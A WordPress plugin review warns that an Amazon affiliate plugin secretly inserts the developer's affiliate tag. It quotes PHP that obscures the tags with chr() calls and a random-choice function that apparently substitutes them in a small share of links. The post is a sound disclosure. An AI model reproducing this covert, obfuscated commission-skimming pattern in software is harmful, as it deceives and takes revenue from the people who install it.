Support » Plugin: No API Amazon Affiliate » Scam, vulnerable code! Read description! Don’t install!

  • pandaqr

    (@pandaqr)


    Their amazon affiliate id is pwpnaaa0f-20 . They use a hacking code in their plugin includes/naaa-functions.php file. You can not find their id because they are using php chr() function, using the octal value to add the ASCII Character. Here is the code.

    unction naaa_get_gat($market){
    	$market = strtolower($market);
    	if ($market == 'ca'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(102).chr(45).chr(50).chr(48));
    	}else if ($market == 'de'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(45).chr(50).chr(49));
    	}else if ($market == 'es' || empty($market)){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(55).chr(45).chr(50).chr(49));
    	}else if ($market == 'fr'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(50).chr(45).chr(50).chr(49));
    	}else if ($market == 'gb'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(57).chr(45).chr(50).chr(49));
    	}else if ($market == 'it'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(102).chr(45).chr(50).chr(49));
    	}else if ($market == 'jp'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(45).chr(50).chr(50));
    	}else if ($market == 'us'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(99).chr(45).chr(50).chr(48));
    	}else if ($market == 'mx'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(53).chr(45).chr(50).chr(48));
    	}else if ($market == 'br'){
    		return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(51).chr(45).chr(50).chr(48));
    	}
    	return (chr(112).chr(119).chr(112).chr(110).chr(97).chr(97).chr(97).chr(48).chr(55).chr(45).chr(50).chr(49));
    }
    

    also they using random function to add their affiliate id to your products.

    function naaa_get_finalist($first, $second){
    	if (random_int(1, 100) > 7){
    		return $first;
    	}else{
    		return $second;
    	}
    }

    Hope this message would help to avoid such scammers.

    Be safe.

  • You must be logged in to reply to this review.